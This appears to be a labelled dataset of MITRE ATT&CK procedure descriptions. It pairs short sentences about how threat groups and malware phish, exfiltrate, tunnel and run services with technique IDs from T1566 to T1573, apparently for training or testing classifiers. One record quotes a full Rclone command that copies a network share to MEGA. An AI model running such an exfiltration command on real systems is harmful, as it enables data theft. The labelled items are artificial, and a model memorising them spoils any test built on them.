{"text1":"APT32 has sent spearphishing emails with a malicious executable disguised as a document or spreadsheet.","labels":"['T1566.001']"}
{"text1":"APT37 delivers malware using spearphishing emails with malicious HWP attachments.","labels":"['T1566.001']"}
{"text1":"APT38 has conducted spearphishing campaigns using malicious email attachments.","labels":"['T1566.001']"}
{"text1":"APT39 leveraged spearphishing emails with malicious attachments to initially compromise victims.","labels":"['T1566.001']"}
{"text1":"APT41 sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.","labels":"['T1566.001']"}
{"text1":"Ajax Security Team has used personalized spearphishing attachments.","labels":"['T1566.001']"}
{"text1":"Andariel has conducted spearphishing campaigns that included malicious Word or Excel attachments.","labels":"['T1566.001']"}
{"text1":"BLINDINGCAN has been delivered by phishing emails containing malicious Microsoft Office documents.","labels":"['T1566.001']"}
{"text1":"BRONZE BUTLER used spearphishing emails with malicious Microsoft Word attachments to infect victims.","labels":"['T1566.001']"}
{"text1":"Bandook is delivered via a malicious Word document inside a zip file.","labels":"['T1566.001']"}
{"text1":"Bisonal has been delivered as malicious email attachments.","labels":"['T1566.001']"}
{"text1":"BlackTech has used spearphishing e-mails with malicious password-protected archived files (ZIP or RAR) to deliver malware.","labels":"['T1566.001']"}
{"text1":"Bumblebee has gained execution through luring users into opening malicious attachments.","labels":"['T1566.001']"}
{"text1":"Chaes has been delivered by sending victims a phishing email containing a malicious .docx file.","labels":"['T1566.001']"}
{"text1":"Cobalt Group has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables.","labels":"['T1566.001']"}
{"text1":"DanBot has been distributed within a malicious Excel attachment via spearphishing emails.","labels":"['T1566.001']"}
{"text1":"DarkHydrus has sent spearphishing emails with password-protected RAR archives containing malicious Excel Web Query files (.iqy). The group has also sent spearphishing emails that contained malicious Microsoft Office documents that use the \u201cattachedTemplate\u201d technique to load a template from a remote server.","labels":"['T1566.001']"}
{"text1":"DarkWatchman has been delivered via spearphishing emails that contain a malicious zip file.","labels":"['T1566.001']"}
{"text1":"Dragonfly 2.0 used spearphishing with Microsoft Office attachments to target victims.","labels":"['T1566.001']"}
{"text1":"During Operation Dust Storm, the threat actors sent spearphishing emails that contained a malicious Microsoft Word document.","labels":"['T1566.001']"}
{"text1":"Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing malicious attachments.","labels":"['T1566.001']"}
{"text1":"Ember Bear has sent spearphishing emails containing malicious attachments in the form of PDFs, Word documents, JavaScript files, and Control Panel File (CPL) executables.","labels":"['T1566.001']"}
{"text1":"Emotet has been delivered by phishing emails containing attachments.","labels":"['T1566.001']"}
{"text1":"EnvyScout has been distributed via spearphishing as an email attachment.","labels":"['T1566.001']"}
{"text1":"FIN7 sent spearphishing emails with either malicious Microsoft Documents or RTF files attached.","labels":"['T1566.001']"}
{"text1":"FIN8 has distributed targeted emails containing Word documents with embedded malicious macros.","labels":"['T1566.001']"}
{"text1":"Ferocious Kitten has conducted spearphishing campaigns containing malicious documents to lure victims to open the attachments.","labels":"['T1566.001']"}
{"text1":"Flagpro has been distributed via spearphishing as an email attachment.","labels":"['T1566.001']"}
{"text1":"For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.","labels":"['T1566.001']"}
{"text1":"Frankenstein has used spearphishing emails to send trojanized Microsoft Word documents.","labels":"['T1566.001']"}
{"text1":"Gallmaker sent emails with malicious Microsoft Office documents attached.","labels":"['T1566.001']"}
{"text1":"Gamaredon Group has delivered spearphishing emails with malicious attachments to targets.","labels":"['T1566.001']"}
{"text1":"Gorgon Group sent emails to victims with malicious Microsoft Office documents attached.","labels":"['T1566.001']"}
{"text1":"Hancitor has been delivered via phishing emails with malicious attachments.","labels":"['T1566.001']"}
{"text1":"IcedID has been delivered via phishing e-mails with malicious attachments.","labels":"['T1566.001']"}
{"text1":"IndigoZebra sent spearphishing emails containing malicious password-protected RAR attachments.","labels":"['T1566.001']"}
{"text1":"JSS Loader has been delivered by phishing emails containing malicious Microsoft Excel attachments.","labels":"['T1566.001']"}
{"text1":"Javali has been delivered as malicious e-mail attachments.","labels":"['T1566.001']"}
{"text1":"KOCTOPUS has been distributed via spearphishing emails with malicious attachments.","labels":"['T1566.001']"}
{"text1":"Kerrdown has been distributed through malicious e-mail attachments.","labels":"['T1566.001']"}
{"text1":"Kimsuky has used emails containing Word, Excel and\/or HWP (Hangul Word Processor) documents in their spearphishing campaigns.","labels":"['T1566.001']"}
{"text1":"Lokibot is delivered via a malicious XLS attachment contained within a spearhpishing email.","labels":"['T1566.001']"}
{"text1":"Metamorfo has been delivered to victims via emails with malicious HTML attachments.","labels":"['T1566.001']"}
{"text1":"Mofang delivered spearphishing emails with malicious documents, PDFs, or Excel files attached.","labels":"['T1566.001']"}
{"text1":"OceanSalt has been delivered via spearphishing emails with Microsoft Office attachments.","labels":"['T1566.001']"}
{"text1":"OilRig has sent spearphising emails with malicious attachments to potential victims using compromised and\/or spoofed email accounts.","labels":"['T1566.001']"}
{"text1":"OutSteel has been distributed as a malicious attachment within a spearphishing email.","labels":"['T1566.001']"}
{"text1":"PLATINUM has sent spearphishing emails with attachments to victims as its primary initial access vector.","labels":"['T1566.001']"}
{"text1":"Patchwork has used spearphishing with an attachment to deliver files with exploits to initial victims.","labels":"['T1566.001']"}
{"text1":"PoetRAT was distributed via malicious Word documents.","labels":"['T1566.001']"}
{"text1":"Pony has been delivered via spearphishing attachments.","labels":"['T1566.001']"}
{"text1":"ROKRAT has been delivered via spearphishing emails that contain a malicious Hangul Office or Microsoft Word document.","labels":"['T1566.001']"}
{"text1":"RTM has been delivered via spearphishing attachments disguised as PDF documents.","labels":"['T1566.001']"}
{"text1":"RTM has used spearphishing attachments to distribute its malware.","labels":"['T1566.001']"}
{"text1":"Rancor has attached a malicious document to an email to gain initial access.","labels":"['T1566.001']"}
{"text1":"Rifdoor has been distributed in e-mails with malicious Excel or Word documents.","labels":"['T1566.001']"}
{"text1":"Sandworm Team has delivered malicious Microsoft Office attachments via spearphishing emails.","labels":"['T1566.001']"}
{"text1":"Sharpshooter has sent malicious attachments via emails to targets.","labels":"['T1566.001']"}
{"text1":"SideCopy has sent spearphishing emails with malicious hta file attachments.","labels":"['T1566.001']"}
{"text1":"Silence has sent emails with malicious DOCX, CHM, LNK and ZIP attachments.","labels":"['T1566.001']"}
{"text1":"Squirrelwaffle has been distributed via malicious Microsoft Office documents within spam emails.","labels":"['T1566.001']"}
{"text1":"TA459 has targeted victims using spearphishing emails with malicious Microsoft Word attachments.","labels":"['T1566.001']"}
{"text1":"TA505 has used spearphishing emails with malicious attachments to initially compromise victims.","labels":"['T1566.001']"}
{"text1":"TA551 has sent spearphishing attachments with password protected ZIP files.","labels":"['T1566.001']"}
{"text1":"The White Company has sent phishing emails with malicious Microsoft Word attachments to victims.","labels":"['T1566.001']"}
{"text1":"ThreatNeedle has been distributed via a malicious Word document within a spearphishing email.","labels":"['T1566.001']"}
{"text1":"Transparent Tribe has sent spearphishing e-mails with attachments to deliver malicious payloads.","labels":"['T1566.001']"}
{"text1":"TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware","labels":"['T1566.001']"}
{"text1":"Tropic Trooper sent spearphishing emails that contained malicious Microsoft Office and fake installer file attachments.","labels":"['T1566.001']"}
{"text1":"Turla has used spearphishing emails to deliver BrainTest as a malicious attachment.","labels":"['T1566.001']"}
{"text1":"Valak has been delivered via spearphishing e-mails with password protected ZIP files.","labels":"['T1566.001']"}
{"text1":"Windshift has sent spearphishing emails with attachment to harvest credentials and deliver malware.","labels":"['T1566.001']"}
{"text1":"Wizard Spider has used spearphishing attachments to deliver Microsoft documents containing macros or PDFs containing malicious links to download either Emotet, Bokbot, TrickBot, or Bazar.","labels":"['T1566.001']"}
{"text1":"ZxxZ has been distributed via spearphishing emails, usually containing a malicious RTF or Excel attachment.","labels":"['T1566.001']"}
{"text1":"admin@338 has sent emails with malicious Microsoft Office documents attached.","labels":"['T1566.001']"}
{"text1":"AADInternals can send \"consent phishing\" emails containing malicious links designed to steal users\u2019 access tokens.","labels":"['T1566.002']"}
{"text1":"APT28 sent spearphishing emails which used a URL-shortener service to masquerade as a legitimate service and to redirect targets to credential harvesting sites.","labels":"['T1566.002']"}
{"text1":"APT39 leveraged spearphishing emails with malicious links to initially compromise victims.","labels":"['T1566.002']"}
{"text1":"AppleJeus has been distributed via spearphishing link.","labels":"['T1566.002']"}
{"text1":"Bazar has been spread via emails with embedded malicious links.","labels":"['T1566.002']"}
{"text1":"BlackTech has used spearphishing e-mails with links to cloud services to deliver malware.","labels":"['T1566.002']"}
{"text1":"Bumblebee has been spread through e-mail campaigns with malicious links.","labels":"['T1566.002']"}
{"text1":"Confucius has sent malicious links to victims through email campaigns.","labels":"['T1566.002']"}
{"text1":"Dragonfly 2.0 used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites.","labels":"['T1566.002']"}
{"text1":"During C0011, Transparent Tribe sent emails containing a malicious link to student targets in India.","labels":"['T1566.002']"}
{"text1":"During Night Dragon, threat actors sent spearphishing emails containing links to compromised websites where malware was downloaded.","labels":"['T1566.002']"}
{"text1":"During Operation Dust Storm, the threat actors sent spearphishing emails containing a malicious link.","labels":"['T1566.002']"}
{"text1":"EXOTIC LILY has relied on victims to open malicious links in e-mails for execution.","labels":"['T1566.002']"}
{"text1":"Earth Lusca has sent spearphishing emails to potential targets that contained a malicious link.","labels":"['T1566.002']"}
{"text1":"Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server.","labels":"['T1566.002']"}
{"text1":"Ember Bear has sent spearphishing emails containing malicious links.","labels":"['T1566.002']"}
{"text1":"FIN7 has conducted broad phishing campaigns using malicious links.","labels":"['T1566.002']"}
{"text1":"Hancitor has been delivered via phishing emails which contained malicious links.","labels":"['T1566.002']"}
{"text1":"Javali has been delivered via malicious links embedded in e-mails.","labels":"['T1566.002']"}
{"text1":"KOCTOPUS has been distributed as a malicious link within an email.","labels":"['T1566.002']"}
{"text1":"Kimsuky has sent spearphishing emails containing a link to a document that contained malicious macros or took the victim to an actor-controlled domain.","labels":"['T1566.002']"}
{"text1":"Lazarus Group has sent malicious links to victims via email.","labels":"['T1566.002']"}
{"text1":"LazyScripter has used spam emails that contain a link that redirects the victim to download a malicious document.","labels":"['T1566.002']"}
{"text1":"Leviathan has sent spearphishing emails with links, often using a fraudulent lookalike domain and stolen branding.","labels":"['T1566.002']"}
{"text1":"Magic Hound has sent malicious URL links through email to victims. In some cases the URLs were shortened or linked to Word documents with malicious macros that executed PowerShells scripts to download Pupy.","labels":"['T1566.002']"}
{"text1":"Melcoz has been spread through malicious links embedded in e-mails.","labels":"['T1566.002']"}
{"text1":"Mofang delivered spearphishing emails with malicious links included.","labels":"['T1566.002']"}
{"text1":"Night Dragon sent spearphishing emails containing links to compromised websites where malware was downloaded.","labels":"['T1566.002']"}
{"text1":"OutSteel has been distributed through malicious links contained within spearphishing emails.","labels":"['T1566.002']"}
{"text1":"QakBot has spread through emails with malicious links.","labels":"['T1566.002']"}
{"text1":"Saint Bot has been distributed through malicious links contained within spearphishing emails.","labels":"['T1566.002']"}
{"text1":"Sidewinder has sent e-mails with malicious links often crafted for specific targets.","labels":"['T1566.002']"}
{"text1":"Squirrelwaffle has been distributed through phishing emails containing a malicious URL.","labels":"['T1566.002']"}
{"text1":"Stolen Pencil sent spearphishing emails containing links to domains controlled by the threat actor.","labels":"['T1566.002']"}
{"text1":"TA505 has sent spearphishing emails containing malicious links.","labels":"['T1566.002']"}
{"text1":"TrickBot has been delivered via malicious links in phishing e-mails.","labels":"['T1566.002']"}
{"text1":"Turla attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access.","labels":"['T1566.002']"}
{"text1":"Windshift has sent spearphishing emails with links to harvest credentials and deliver malware.","labels":"['T1566.002']"}
{"text1":"ZIRCONIUM has used malicious links and web beacons in e-mails for malware download and to track hits to attacker-controlled URL's.","labels":"['T1566.002']"}
{"text1":"APT29 has used the legitimate mailing service Constant Contact to send phishing e-mails.","labels":"['T1566.003']"}
{"text1":"Ajax Security Team has used various social media channels to spearphish victims.","labels":"['T1566.003']"}
{"text1":"FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets.","labels":"['T1566.003']"}
{"text1":"Lazarus Group has used fake job advertisements sent via LinkedIn to spearphish victims.","labels":"['T1566.003']"}
{"text1":"Lazarus Group has used social media platforms, including LinkedIn and Twitter, to send spearphishing messages.","labels":"['T1566.003']"}
{"text1":"Magic Hound used various social media channels (such as LinkedIn) as well as messaging services (such as WhatsApp) to spearphish victims.","labels":"['T1566.003']"}
{"text1":"OilRig has used LinkedIn to send spearphishing links.","labels":"['T1566.003']"}
{"text1":"APT28 can exfiltrate data over Google Drive.","labels":"['T1567']"}
{"text1":"AppleSeed has exfiltrated files using web services.","labels":"['T1567']"}
{"text1":"DropBook has used legitimate web services to exfiltrate data.","labels":"['T1567']"}
{"text1":"BoomBox can upload data to dedicated per-victim folders in Dropbox.","labels":"['T1567.002']"}
{"text1":"Chimera has exfiltrated stolen data to OneDrive accounts.","labels":"['T1567.002']"}
{"text1":"Clambling can send files from a victim's machine to Dropbox.","labels":"['T1567.002']"}
{"text1":"Confucius has exfiltrated victim data to cloud storage service accounts.","labels":"['T1567.002']"}
{"text1":"CreepyDrive can use cloud services including OneDrive for data exfiltration.","labels":"['T1567.002']"}
{"text1":"During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y \"\\\\SERVER\\Shares\" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.","labels":"['T1567.002']"}
{"text1":"Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA.","labels":"['T1567.002']"}
{"text1":"Empire can use Dropbox for data exfiltration.","labels":"['T1567.002']"}
{"text1":"FIN7 has exfiltrated stolen data to the MEGA file sharing site.","labels":"['T1567.002']"}
{"text1":"HEXANE has used cloud services, including OneDrive, for data exfiltration.","labels":"['T1567.002']"}
{"text1":"Lazarus Group has exfiltrated stolen data to Dropbox using a customized version of dbxcli.","labels":"['T1567.002']"}
{"text1":"Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.","labels":"['T1567.002']"}
{"text1":"POLONIUM has exfiltrated stolen data to POLONIUM-owned OneDrive and Dropbox accounts.","labels":"['T1567.002']"}
{"text1":"ROKRAT can send collected data to cloud storage services such as PCloud.","labels":"['T1567.002']"}
{"text1":"RainyDay can use a file exfiltration tool to upload specific files to Dropbox.","labels":"['T1567.002']"}
{"text1":"Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.","labels":"['T1567.002']"}
{"text1":"Turla has used WebDAV to upload stolen USB files to a cloud drive. Turla has also exfiltrated stolen files to OneDrive and 4shared.","labels":"['T1567.002']"}
{"text1":"ZIRCONIUM has exfiltrated stolen data to Dropbox.","labels":"['T1567.002']"}
{"text1":"APT29 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.","labels":"['T1568']"}
{"text1":"Bisonal has used a dynamic DNS service for C2.","labels":"['T1568']"}
{"text1":"During Night Dragon, threat actors used dynamic DNS services for C2.","labels":"['T1568']"}
{"text1":"For Operation Spalax, the threat actors used dynamic DNS services, including Duck DNS and DNS Exit, as part of their C2 infrastructure.","labels":"['T1568']"}
{"text1":"Gamaredon Group has incorporated dynamic DNS domains in its infrastructure.","labels":"['T1568']"}
{"text1":"Gelsemium can use dynamic DNS domain names in C2.","labels":"['T1568']"}
{"text1":"Gelsemium has used dynamic DNS in its C2 infrastructure.","labels":"['T1568']"}
{"text1":"NETEAGLE can use HTTP to download resources that contain an IP address and port number pair to connect to for C2.","labels":"['T1568']"}
{"text1":"Tomiris has connected to a signalization server that provides a URL and port, and then Tomiris sends a GET request to that URL to establish C2.","labels":"['T1568']"}
{"text1":"UNC2452 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.","labels":"['T1568']"}
{"text1":"Machete has used free dynamic DNS domains for C2.","labels":"['T1568.001']"}
{"text1":"TA505 has used fast flux to mask botnets by distributing payloads across multiple IPs.","labels":"['T1568.001']"}
{"text1":"gh0st RAT operators have used dynamic DNS to mask the true location of their C2 behind rapidly changing IP addresses.","labels":"['T1568.001']"}
{"text1":"njRAT has used a fast flux DNS for C2 IP resolution.","labels":"['T1568.001']"}
{"text1":"Bazar can implement DGA using the current date as a seed variable.","labels":"['T1568.002']"}
{"text1":"CCBkdr can use a DGA for Fallback Channels if communications with the primary command and control server are lost.","labels":"['T1568.002']"}
{"text1":"CHOPSTICK can use a DGA for Fallback Channels, domains are generated by concatenating words from lists.","labels":"['T1568.002']"}
{"text1":"Conficker has used a DGA that seeds with the current UTC victim system date to generate domains.","labels":"['T1568.002']"}
{"text1":"DarkWatchman has used a DGA to generate a domain name for C2.","labels":"['T1568.002']"}
{"text1":"Ebury has used a DGA to generate a domain name for C2.","labels":"['T1568.002']"}
{"text1":"MiniDuke can use DGA to generate new Twitter URLs for C2.","labels":"['T1568.002']"}
{"text1":"Ngrok can provide DGA for C2 servers through the use of random URL strings that change every 12 hours.","labels":"['T1568.002']"}
{"text1":"QakBot can use domain generation algorithms in C2 communication.","labels":"['T1568.002']"}
{"text1":"ShadowPad uses a DGA that is based on the day of the month for C2 servers.","labels":"['T1568.002']"}
{"text1":"Shark can send DNS C2 communications using a unique domain generation algorithm.","labels":"['T1568.002']"}
{"text1":"SombRAT can use a custom DGA to generate a subdomain for C2.","labels":"['T1568.002']"}
{"text1":"TA551 has used a DGA to generate URLs from executed macros.","labels":"['T1568.002']"}
{"text1":"TeamTNT has created system services to execute cryptocurrency mining software.","labels":"['T1569']"}
{"text1":"AppleJeus has loaded a plist file using the \"launchctl\" command.","labels":"['T1569.001']"}
{"text1":"Calisto uses launchctl to enable screen sharing on the victim\u2019s machine.","labels":"['T1569.001']"}
{"text1":"XCSSET loads a system level launchdaemon using the \"launchctl load -w\" command from \"\/System\/Librarby\/LaunchDaemons\/ssh.plist\".","labels":"['T1569.001']"}
{"text1":"macOS.OSAMiner has used `launchctl` to restart the Launch Agent.","labels":"['T1569.001']"}
{"text1":"APT38 has created new services or modified existing ones to run executables, commands, or scripts.","labels":"['T1569.002']"}
{"text1":"APT39 has used post-exploitation tools including RemCom and the Non-sucking Service Manager (NSSM) to execute processes.","labels":"['T1569.002']"}
{"text1":"APT41 used  svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON loader.","labels":"['T1569.002']"}
{"text1":"Anchor can create and execute services to load its payload.","labels":"['T1569.002']"}
{"text1":"Chimera has used PsExec to deploy beacons on compromised systems.","labels":"['T1569.002']"}
{"text1":"Cobalt Strike can use PsExec to execute a payload on a remote host. It can also use Service Control Manager to start new services.","labels":"['T1569.002']"}
{"text1":"During Operation Honeybee, threat actors ran \"sc start\" to start the COMSysApp as part of the service hijacking and \"sc stop\" to stop and reconfigure the COMSysApp.","labels":"['T1569.002']"}
{"text1":"During Operation Wocao, threat actors created services on remote systems for execution purposes.","labels":"['T1569.002']"}
{"text1":"Empire can use PsExec to execute a payload on a remote host.","labels":"['T1569.002']"}
{"text1":"FIN6 has created Windows services to execute encoded PowerShell commands.","labels":"['T1569.002']"}
{"text1":"HOPLIGHT has used svchost.exe to execute a malicious DLL .","labels":"['T1569.002']"}
{"text1":"HermeticWiper can create system services to aid in executing the payload.","labels":"['T1569.002']"}
{"text1":"HermeticWizard can use `OpenRemoteServiceManager` to create a service.","labels":"['T1569.002']"}
{"text1":"Honeybee launches a DLL file that gets executed as a service using svchost.exe","labels":"['T1569.002']"}
{"text1":"Hydraq uses svchost.exe to execute a malicious DLL included in a new service group.","labels":"['T1569.002']"}
{"text1":"HyperBro has the ability to start and stop a specified service.","labels":"['T1569.002']"}
{"text1":"Impacket contains various modules emulating other service execution tools such as PsExec.","labels":"['T1569.002']"}
{"text1":"InvisiMole has used Windows services as a way to execute its malicious payload.","labels":"['T1569.002']"}
{"text1":"Ke3chang has used a tool known as RemoteExec (similar to PsExec) to remotely execute batch scripts and binaries.","labels":"['T1569.002']"}
{"text1":"Koadic can run a command on another machine using PsExec.","labels":"['T1569.002']"}
{"text1":"LoudMiner started the cryptomining virtual machine as a service on the infected machine.","labels":"['T1569.002']"}
{"text1":"NotPetya can use PsExec to help propagate itself across a network.","labels":"['T1569.002']"}
{"text1":"Okrum's loader can create a new service named NtmsSvc to execute the payload.","labels":"['T1569.002']"}
{"text1":"Olympic Destroyer utilizes PsExec to help propagate itself across a network.","labels":"['T1569.002']"}
{"text1":"Operation Wocao has created services on remote systems for execution purposes.","labels":"['T1569.002']"}
{"text1":"PoshC2 contains an implementation of PsExec for remote execution.","labels":"['T1569.002']"}
{"text1":"Proxysvc registers itself as a service on the victim\u2019s machine to run as a standalone process.","labels":"['T1569.002']"}
{"text1":"Pupy uses PsExec to execute a payload or commands on a remote host.","labels":"['T1569.002']"}
{"text1":"RemoteCMD can execute commands remotely by creating a new service on the remote system.","labels":"['T1569.002']"}
{"text1":"Shamoon creates a new service named \u201cntssrv\u201d to execute the payload. Shamoon can also spread via PsExec.","labels":"['T1569.002']"}
{"text1":"SysUpdate can manage services and processes.","labels":"['T1569.002']"}
{"text1":"The \"net start\" and \"net stop\" commands can be used in Net to execute or stop Windows services.","labels":"['T1569.002']"}
{"text1":"TinyTurla can install itself as a service on compromised machines.","labels":"['T1569.002']"}
{"text1":"WastedLocker can execute itself as a service.","labels":"['T1569.002']"}
{"text1":"Winexe installs a service on the remote system, executes the command, then uninstalls the service.","labels":"['T1569.002']"}
{"text1":"Winnti for Windows can run as a service using svchost.exe.","labels":"['T1569.002']"}
{"text1":"Wizard Spider has used services.exe to execute scripts and executables during lateral movement within a victim network.","labels":"['T1569.002']"}
{"text1":"APT32 has deployed tools after moving laterally using administrative accounts.","labels":"['T1570']"}
{"text1":"Aoqin Dragon has spread malware in target networks by copying modules to folders masquerading as removable devices.","labels":"['T1570']"}
{"text1":"BITSAdmin can be used to create BITS Jobs to upload and\/or download files from SMB file servers.","labels":"['T1570']"}
{"text1":"Chimera has copied tools between compromised hosts using SMB.","labels":"['T1570']"}
{"text1":"During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network.","labels":"['T1570']"}
{"text1":"DustySky searches for network drives and removable media and duplicates itself onto them.","labels":"['T1570']"}
{"text1":"Expand can be used to download or upload a file over a network share.","labels":"['T1570']"}
{"text1":"FIN10 has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.","labels":"['T1570']"}
{"text1":"GALLIUM has used PsExec to move laterally between hosts in the target network.","labels":"['T1570']"}
{"text1":"HermeticWizard can copy files to other machines on a compromised network.","labels":"['T1570']"}
{"text1":"Kerrdown can download additional software including Cobalt Strike from servers on the victim's network.","labels":"['T1570']"}
{"text1":"LockerGoga has been observed moving around the victim network via SMB, indicating the actors behind this ransomware are manually copying files form computer to computer instead of self-propagating.","labels":"['T1570']"}
{"text1":"Olympic Destroyer attempts to copy itself to remote machines on the network.","labels":"['T1570']"}
{"text1":"Operation Wocao has used SMB to copy files to and from target systems.","labels":"['T1570']"}
{"text1":"PsExec can be used to download or upload a file over a network share.","labels":"['T1570']"}
{"text1":"Sandworm Team has used `move` to transfer files to a network share.","labels":"['T1570']"}
{"text1":"Shamoon attempts to copy itself to remote machines on the network.","labels":"['T1570']"}
{"text1":"Stuxnet uses an RPC server that contains a file dropping routine and support for payload version updates for P2P communications within a victim network.","labels":"['T1570']"}
{"text1":"Turla RPC backdoors can be used to transfer files to\/from victim machines on the local network.","labels":"['T1570']"}
{"text1":"WannaCry attempts to copy itself to remote computers after gaining access via an SMB exploit.","labels":"['T1570']"}
{"text1":"Wizard Spider has used stolen credentials to copy tools into the \"%TEMP%\" directory of domain controllers.","labels":"['T1570']"}
{"text1":"cmd can be used to copy files to\/from a remotely connected internal system.","labels":"['T1570']"}
{"text1":"esentutl can be used to copy files to\/from a remote share.","labels":"['T1570']"}
{"text1":"ftp may be abused by adversaries to transfer tools or files between systems within a compromised environment.","labels":"['T1570']"}
{"text1":"APT-C-36 has used port 4050 for C2 communications.","labels":"['T1571']"}
{"text1":"APT33 has used HTTP over TCP ports 808 and 880 for command and control.","labels":"['T1571']"}
{"text1":"An APT32 backdoor can use HTTP over a non-standard TCP port (e.g 14146) which is specified in the backdoor configuration.","labels":"['T1571']"}
{"text1":"BADCALL communicates on ports 443 and 8000 with a FakeTLS method.","labels":"['T1571']"}
{"text1":"Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.","labels":"['T1571']"}
{"text1":"BendyBear has used a custom RC4 and XOR encrypted protocol over port 443 for C2.","labels":"['T1571']"}
{"text1":"Cyclops Blink can use non-standard ports for C2 not typically associated with HTTP or HTTPS traffic.","labels":"['T1571']"}
{"text1":"DarkVishnya used ports 5190 and 7900 for shellcode listeners, and 4444, 4445, 31337 for shellcode C2.","labels":"['T1571']"}
{"text1":"Derusbi has used unencrypted HTTP on port 443 for C2.","labels":"['T1571']"}
{"text1":"Emotet has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP\/S.","labels":"['T1571']"}
{"text1":"FIN7 has used port-protocol mismatches on ports such as 53, 80, 443, and 8080 during C2.","labels":"['T1571']"}
{"text1":"GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic, 9002 for C2 requests, 33666 as a WebSocket, and 8090 to download files.","labels":"['T1571']"}
{"text1":"GravityRAT has used HTTP over a non-standard port, such as TCP port 46769.","labels":"['T1571']"}
{"text1":"HARDRAIN binds and listens on port 443 with a FakeTLS method.","labels":"['T1571']"}
{"text1":"HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method.","labels":"['T1571']"}
{"text1":"Magic Hound malware has communicated with its C2 server over TCP port 4443 using HTTP.","labels":"['T1571']"}
{"text1":"Metamorfo has communicated with hosts over raw TCP on port 9999.","labels":"['T1571']"}
{"text1":"PoetRAT used TLS to encrypt communications over port 143","labels":"['T1571']"}
{"text1":"QuasarRAT can use port 4782 on the compromised host for TCP callbacks.","labels":"['T1571']"}
{"text1":"RTM used Port 44443 for its VNC module.","labels":"['T1571']"}
{"text1":"Rocke's miner connects to a C2 server using port 51640.","labels":"['T1571']"}
{"text1":"Sandworm Team has used port 6789 to accept connections on the group's SSH server.","labels":"['T1571']"}
{"text1":"Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches.","labels":"['T1571']"}
{"text1":"TEMP.Veles has used port-protocol mismatches on ports such as 443, 4444, 8531, and 50501 during C2.","labels":"['T1571']"}
{"text1":"TYPEFRAME has used ports 443, 8080, and 8443 with a FakeTLS method.","labels":"['T1571']"}
{"text1":"WIRTE has used HTTPS over ports 2083 and 2087 for C2.","labels":"['T1571']"}
{"text1":"WellMail has been observed using TCP port 25, without using SMTP, to leverage an open port for secure command and control communications.","labels":"['T1571']"}
{"text1":"Chimera has encapsulated Cobalt Strike's C2 protocol in DNS and HTTPS.","labels":"['T1572']"}
{"text1":"Cobalt Group has used the Plink utility to create SSH tunnels.","labels":"['T1572', 'T1573.002']"}
{"text1":"CostaRicto has set up remote SSH tunneling into the victim's environment from a malicious domain.","labels":"['T1572']"}
{"text1":"Cyclops Blink can use DNS over HTTPS (DoH) to resolve C2 nodes.","labels":"['T1572']"}
{"text1":"During CostaRicto, the threat actors set up remote SSH tunneling into the victim's environment from a malicious domain.","labels":"['T1572']"}
{"text1":"FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.","labels":"['T1572', 'T1573.002']"}
{"text1":"Heyoka Backdoor can use spoofed DNS requests to create a bidirectional tunnel between a compromised host and its C2 servers.","labels":"['T1572']"}
{"text1":"Industroyer attempts to perform an HTTP CONNECT via an internal proxy to establish a tunnel.","labels":"['T1572']"}
{"text1":"Kevin can use a custom protocol tunneled through DNS or HTTP.","labels":"['T1572']"}
{"text1":"Milan can use a custom protocol tunneled through DNS or HTTP.","labels":"['T1572']"}
{"text1":"Mythic can use SOCKS proxies to tunnel traffic through another protocol.","labels":"['T1572']"}
{"text1":"Ngrok can tunnel RDP and other services securely over internet connections.","labels":"['T1572']"}
{"text1":"OilRig has used the Plink utility and other tools to create tunnels to C2 servers.","labels":"['T1572']"}
{"text1":"The QakBot proxy module can encapsulate SOCKS5 protocol within its own proxy protocol.","labels":"['T1572']"}
{"text1":"APT29 has used multiple layers of encryption within malware to protect C2 communication.","labels":"['T1573']"}
{"text1":"BITTER has encrypted their C2 communications.","labels":"['T1573']"}
{"text1":"Cryptoistic can engage in encrypted communications with C2.","labels":"['T1573']"}
{"text1":"Lizar can support encrypted communications between the client and server.","labels":"['T1573']"}
{"text1":"NETWIRE can encrypt C2 communications.","labels":"['T1573']"}
{"text1":"PowGoop can receive encrypted commands from C2.","labels":"['T1573']"}
{"text1":"PowerLess can use an encrypted channel for C2 communications.","labels":"['T1573']"}
{"text1":"RCSession can use an encrypted beacon to check in with C2.","labels":"['T1573']"}
{"text1":"Tropic Trooper has encrypted traffic with the C2 to prevent network detection.","labels":"['T1573']"}
{"text1":"gh0st RAT has encrypted TCP communications to evade detection.","labels":"['T1573']"}
{"text1":"A variant of ADVSTORESHELL encrypts some C2 with 3DES.","labels":"['T1573.001']"}
{"text1":"APT12 has used the RIPTIDE RAT, which communicates over HTTP with a payload encrypted with RC4.","labels":"['T1573.001']"}
{"text1":"APT28 installed a Delphi backdoor that used a custom algorithm for C2 communications.","labels":"['T1573.001']"}
